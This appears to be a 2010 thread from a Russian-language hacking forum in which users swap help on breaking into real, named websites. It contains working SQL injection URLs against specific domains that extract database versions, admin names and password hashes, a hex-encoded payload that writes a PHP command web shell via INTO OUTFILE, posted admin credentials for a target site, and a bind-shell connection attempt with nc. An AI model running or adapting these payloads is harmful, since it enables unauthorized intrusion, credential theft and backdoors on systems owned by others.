ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11451  
Старый 03.02.2010, 17:06
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от $ereg@  
вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
теперь пробую залить шелл, делаю запрос :
-999+union+select+1,2,0x3c3f206563686f205c223c70726 53e5c223b4073797374656d28245f4745545b5c22636d645c2 25d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+ INTO+OUTFILE+'/var/www/bans/z.php'--

В ответ получаю ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1

пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
опытные кулхацкеры подскажите ламеру чё делать
Цитата:
near '/var/www/bans/z.php--
путь не обрамлен ковычками, если ковычки слешируются try https://forum.antichat.ru/showpost.php?p=663815&postcount=39
других вариантов на сегодняшний день не имеется
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #11452  
Старый 03.02.2010, 20:07
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
http://www.heel.com.ua
Админка внизу сайта

логин: admin
pass: shutnick
 
Ответить с цитированием

  #11453  
Старый 03.02.2010, 20:55
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

вот у меня вопрос по поводу открытия RDP на машине с Win. Там стоит мускул 5. Неоднократно открыл через скул рдп на mssql но есть ли возможность через мускул?
 
Ответить с цитированием

  #11454  
Старый 03.02.2010, 22:24
Аватар для Komyak
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию

Не могу больше ничего получить, не хватает думалки:
Код:
http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables--
Что из этого можно вытянуть?
77-log:3g-administrator@localhost
 
Ответить с цитированием

  #11455  
Старый 03.02.2010, 23:03
Аватар для nemaniak
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

а там ничего толкового не получишь...

Код:
http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,admin_id,admin_name%29,9,10,11,12+from+admin--
колонки с пассами нет((
 
Ответить с цитированием

  #11456  
Старый 04.02.2010, 00:24
Аватар для RedX
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402

Репутация: 22
Отправить сообщение для RedX с помощью ICQ
По умолчанию

Цитата:
Сообщение от Assembler  
Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
http://www.heel.com.ua
Админка внизу сайта

логин: admin
pass: shutnick
/var/www/heelezTH/heel.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/commands.php

http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version%28%29,Databa se%28%29,User%28%29%29,4,5,6,7,8--%20+
 
Ответить с цитированием

  #11457  
Старый 04.02.2010, 19:37
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

все зделаю и ок..а в конце не полуцается..

а зацем ??

http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+g2_User
 
Ответить с цитированием

  #11458  
Старый 04.02.2010, 19:40
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Таблица в другой базе данных
http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+usr_web0_2.g2_User
 
Ответить с цитированием

  #11459  
Старый 04.02.2010, 19:58
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

spasibo ElteRUS
 
Ответить с цитированием

  #11460  
Старый 05.02.2010, 10:06
Аватар для StarFire
StarFire
Познающий
Регистрация: 11.09.2008
Сообщений: 94
Провел на форуме:
999862

Репутация: 19
Отправить сообщение для StarFire с помощью ICQ
По умолчанию

делаю бинд порт на freebsd,проверяю
Код:
tcp        0      0 0.0.0.0:37695           0.0.0.0:*               LISTEN
порт открылся,пробую приконектится
Код:
nc
Cmd line: xx.xx.xx.xx 37695
(UNKNOWN) [xx.xx.xx.xx] 37695 (?) : Connection timed out
в чем может быть проблема ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ